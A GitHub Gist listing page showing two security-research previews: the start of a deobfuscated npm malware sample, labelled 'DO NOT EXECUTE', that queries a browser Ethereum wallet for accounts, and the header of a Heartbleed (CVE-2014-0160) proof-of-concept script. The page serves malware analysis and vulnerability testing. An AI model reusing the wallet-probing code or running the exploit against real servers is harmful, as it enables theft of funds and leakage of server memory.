tintinweb tintinweb
🍣
tintinweb
/ npm-vulnerability-deobfusicated.js
Created
September 8, 2025 17:16
— forked from sindresorhus/chalk-source-index-with-malware.js
DO NOT EXECUTE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Deobfusicated with https://obf-io.deobfuscate.io | |
| var neth = 0; | |
| var rund = 0; | |
| var loval = 0; | |
| async function checkethereumw() { | |
| try { | |
| const _0x124ed3 = await window.ethereum.request({ | |
| 'method': "eth_accounts" | |
| }); |
tintinweb
/ hb-test.py
Last active
August 29, 2015 13:58
— forked from takeshixx/hb-test.py
CVE-2014-0160 - OpenSSL tcp heartbeat PoC with STARTTLS, XMPP, Proxy CONNECT (SSL) support. Also includes some TLS record fixups, and features like file-dumping, TLS protocol version selection (HBMsg only)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
| # The author disclaims copyright to this source code. | |
| # | |
| # tintinweb | https://github.com/tintinweb | |
| # added proxy CONNECT support | |
| # added HB packet variation for IPS testing | |
| # added valid HB message padding (without HMAC) | |
| # added options for custom HeartBeat.len, payload, fixed size TLSRecord.len, padding |